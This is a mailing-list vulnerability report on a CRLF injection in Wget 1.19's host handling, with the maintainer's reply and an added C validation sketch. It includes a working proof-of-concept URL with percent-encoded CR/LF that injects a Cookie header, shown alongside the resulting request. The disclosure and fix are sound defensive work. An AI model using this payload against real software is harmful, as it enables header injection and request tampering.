On Monday, March 6, 2017 3:42:24 AM CET Orange Tsai wrote:
> Hi
>
> I just found that there is a CRLF Injection in the latest version of Wget
> 1.19.
>
> Wget uses urlencode to encode CRLF in PATH part but doesn't use in HOST
> port. So an attacker can inject arbitrary header in the request.
>
>
> For example:
>
> # This will fail
> $ wget 'http://127.0.0.1/%0d%0Cookie: hi'
>
> GET /%0d%0Cookie:%20hi HTTP/1.1
> User-Agent: Wget/1.19 (linux-gnu)
> Accept: */*
> Accept-Encoding: identity
> Host: 127.0.0.1
> Connection: Keep-Alive
>
>
> # This will work
> $ wget 'http://127.0.0.1%0d%0aCookie%3a hi%0a/'
>
> GET / HTTP/1.1
> User-Agent: Wget/1.19 (linux-gnu)
> Accept: */*
> Accept-Encoding: identity
> Host: [127.0.0.1
> *cookie: hi*
> ]
> Connection: Keep-Alive
>
>
> Wish you aware this, thanks for your reading :)

Thanks, just pushed a commit, not allowing control chars in host part.

Regards, Tim
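
The check described in the reply above (no control characters in the host part), sketched as an added example; it is not Wget's code or the pushed commit. The function names are hypothetical, and rejecting spaces as well as control characters is a choice made for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_val(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Hypothetical helper: true if the still-encoded host bytes can be copied
   into a "Host:" header line. Each %XX escape is decoded before the check,
   so an encoded CR or LF is caught the same way as a literal one. */
bool host_is_header_safe(const char *host, size_t len)
{
    if (len == 0) return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (c == '%') {
            if (len - i < 3) return false;          /* truncated escape */
            int hi = hex_val(host[i + 1]);
            int lo = hex_val(host[i + 2]);
            if (hi < 0 || lo < 0) return false;     /* malformed escape */
            c = (unsigned char)(hi * 16 + lo);
            i += 2;
        }
        /* Control characters (0x00-0x1f, 0x7f) and space (assumption of
           this example) never belong in a host name. */
        if (c <= 0x20 || c == 0x7f) return false;
    }
    return true;
}

/* Hypothetical wrapper: checks everything between "://" and the first
   '/', '?' or '#', i.e. the part of the URL that feeds the Host header. */
bool url_authority_is_header_safe(const char *url)
{
    const char *p = strstr(url, "://");
    if (p == NULL) return false;
    p += 3;
    return host_is_header_safe(p, strcspn(p, "/?#"));
}
```

Run on the two URLs from the report, the first passes (the CRLF sits in the path, which Wget already encodes) and the second is rejected at the decoded `%0d`.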